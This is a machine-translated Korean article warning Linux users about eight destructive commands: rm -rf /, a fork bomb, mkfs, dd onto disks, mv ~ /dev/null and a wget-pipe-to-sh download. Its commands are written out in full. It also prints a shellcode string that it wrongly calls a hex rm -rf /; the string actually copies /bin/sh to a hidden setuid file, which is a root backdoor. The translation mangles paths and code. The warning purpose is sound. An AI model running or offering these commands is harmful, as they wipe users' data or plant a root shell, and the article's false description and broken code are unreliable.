홈페이지 » 어떻게 » 8 개의 치명적인 명령은 Linux에서 실행해서는 안됩니다.

    8 개의 치명적인 명령은 Linux에서 실행해서는 안됩니다.

    리눅스의 터미널 명령은 강력하며 리눅스는 시스템을 망칠 명령을 실행하면 확인을 요구하지 않는다. 새 리눅스 사용자가이 명령을 농담으로 실행하도록 추천하는 온라인 트롤을 보는 것은 드문 일이 아닙니다..

    실행해서는 안되는 명령어를 배우는 것은 트롤로부터 당신을 보호하고 리눅스가 어떻게 작동하는지에 대한 이해를 높이는 데 도움이 될 수 있습니다. 이것은 포괄적 인 가이드는 아니며 여기에있는 명령은 다양한 방법으로 리믹스 될 수 있습니다..

    이 명령들 중 많은 것들은 접두어가 붙어있는 경우에만 위험 할 것입니다. sudo 우분투에서 - 그들은 달리 작동하지 않습니다. 다른 Linux 배포판에서는 대부분의 명령이 루트로 실행되어야합니다..

    이미지 크레디트 : Jason Ford에서 트위터로 리믹스 한 해골 이미지

    rm -rf / - 모든 것을 삭제합니다.!

    명령 rm -rf / 하드 드라이브의 파일 및 연결된 이동식 미디어 장치의 파일을 포함하여 가능한 모든 것을 삭제합니다. 이 명령은 세분화 된 경우 더 이해할 수 있습니다.

    RM - 다음 파일을 제거하십시오..

    -rf - rm을 재귀 적으로 실행하고 (지정된 폴더 내의 모든 파일과 폴더를 삭제) 강제로 모든 파일을 강제로 제거합니다..

    / - rm이 컴퓨터의 모든 파일과 원격 파일 공유 및 이동식 드라이브를 포함하여 마운트 된 모든 미디어 장치를 포함하는 루트 디렉토리에서 시작하도록 지시합니다..

    리눅스는 행복하게이 명령을 따르고 당신에게 메시지를 보내지 않고 모든 것을 지울 것이므로, 그것을 사용할 때 조심해야한다! rm 명령은 다른 위험한 방법으로도 사용할 수 있습니다. - rm -rf ~ 홈 폴더의 모든 파일을 삭제하고 rm -rf. * 모든 구성 파일을 삭제합니다..

    교훈: rm -rf를 조심하십시오..

    위장 된 rm -rf /

    다음은 웹 전체에 걸친 또 다른 스 니펫입니다.

    char esp [] __attribute__ ((section ( ". text"))) / * e.s.p
    릴리스 * /
    = "\ xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68"
    "\ xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99"
    "\ xdf \ x81 \ x8 \ x8 \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7"
    "\ x56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56"
    "\ x8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31"
    "\ xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69"
    "\ x6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00"
    "cp -p / bin / sh /tmp/.beyond; chmod 4755
    /tmp/.beyond; ";

    이것은 16 진수 버전의 rm -rf / - 이 명령을 실행하면 마치 rm -rf /.

    교훈: 당신이 이해하지 못하는 이상하게 보이는, 분명히 위장 된 명령을 실행하지 마십시오..

    : () : | : & ;: - 포크 폭탄

    다음 줄은 단순하지만 위험한 bash 함수입니다.

    : () : | : & ;:

    이 짧은 줄은 자체 복사본을 새로 만드는 셸 함수를 정의합니다. 이 프로세스는 계속해서 복제되며 사본은 계속해서 복제되어 모든 CPU 시간과 메모리를 빠르게 차지합니다. 이로 인해 컴퓨터가 멈출 수 있습니다. 기본적으로 서비스 거부 공격입니다..

    교훈: Bash 함수는 강력하고 심지어 매우 짧은 함수도 있습니다..

    이미지 크레딧 : Dake on Wikimedia Commons

    mkfs.ext4 / dev / sda1 - 하드 드라이브 포맷

    그만큼 mkfs.ext4 / dev / sda1 명령은 이해하기 쉽습니다.

    mkfs.ext4 - 다음 장치에 새로운 ext4 파일 시스템 만들기.

    / dev / sda1 - 아마도 사용중인 첫 번째 하드 드라이브의 첫 번째 파티션을 지정합니다..

    함께이 명령은 Windows에서 형식 c :를 실행하는 것과 같습니다. 첫 번째 파티션의 파일을 지우고 새 파일 시스템으로 바꿉니다..

    이 명령은 다른 형식으로도 올 수 있습니다. - mkfs.ext3 / dev / sdb2 두 번째 하드 드라이브의 두 번째 파티션을 ext3 파일 시스템으로 포맷합니다..

    교훈: / dev / sd로 시작하는 하드 디스크 장치에서 직접 명령 실행하기.

    command> / dev / sda - 하드 드라이브에 직접 씁니다.

    그만큼 명령> / dev / sda 라인은 비슷하게 작동합니다 - 명령을 실행하고 해당 명령의 출력을 첫 번째 하드 드라이브로 직접 보내고 데이터를 직접 하드 디스크 드라이브에 기록하고 파일 시스템을 손상시킵니다.

    명령 - 명령을 실행하십시오 (모든 명령이 가능함).

    > - 명령의 출력을 다음 위치로 보냅니다..

    / dev / sda - 명령의 출력을 하드 디스크 장치에 직접 씁니다..

    교훈: 위와 같이 / dev / sd로 시작하는 하드 디스크 장치와 관련된 명령 실행을 조심하십시오.

    dd if = / dev / random of = / dev / sda - 하드 드라이브에 정크를 씁니다.

    그만큼 dd if = / dev / random of = / dev / sda 라인은 또한 하드 드라이브 중 하나의 데이터를 지울 것입니다.

    DD - 한 위치에서 다른 위치로 저수준 복사 수행.

    if = / dev / random - / dev / random (임의의 데이터)을 입력으로 사용하십시오. - / dev / zero (제로).

    of = / dev / sda - 첫 번째 하드 디스크에 파일 시스템을 임의의 가비지 데이터로 대체하여 출력합니다..

    교훈: dd는 한 위치에서 다른 위치로 데이터를 복사하므로 장치에 직접 복사하는 경우 위험 할 수 있습니다.

    이미지 크레디트 : Flickr의 Matt Rudge

    mv ~ / dev / null - 홈 디렉토리를 블랙홀로 이동

    / dev / null은 또 다른 특별한 위치입니다. - dev / null로 무언가를 이동하는 것은 그것을 파괴하는 것과 같습니다. / dev / null을 블랙홀이라고 생각하십시오. 본질적으로, mv ~ / dev / null 모든 개인 파일을 블랙홀로 보낸다..

    mv - 다음 파일 또는 디렉터리를 다른 위치로 이동하십시오..

    ~ ~ - 전체 홈 폴더를 나타냅니다..

    / dev / null - 홈 폴더를 / dev / null로 이동하여 모든 파일을 삭제하고 원본 복사본 삭제.

    교훈: ~ 문자는 홈 폴더를 나타내며 / dev / null로 움직이는 것은 그들을 파괴합니다.

    wget http://example.com/something -O - | sh - 스크립트 다운로드 및 실행

    위 라인은 웹에서 스크립트를 다운로드하여 스크립트의 내용을 실행하는 sh로 보냅니다. 스크립트가 무엇인지 알지 못하거나 소스를 신뢰하지 않으면 위험 할 수 있습니다. 신뢰할 수없는 스크립트를 실행하지 마십시오..

    wget - 파일을 다운로드합니다. wget 대신 curl이 표시 될 수도 있습니다.

    http://example.com/something - 이 위치에서 파일 다운로드.

    | - wget 명령의 출력 (다운로드 한 파일)을 직접 다른 명령으로 파이프하십시오..

    - 파일을 sh 명령으로 보내십시오. sh 명령은 bash 스크립트 인 경우이를 실행합니다..

    교훈: 명령을 사용하여 웹에서 신뢰할 수없는 스크립트를 다운로드하고 실행하지 마십시오..


    새로운 (경험 많은) Linux 사용자가 실행해서는 안되는 다른 위험한 명령을 알고 있습니까? 의견을 남기고 공유하십시오.!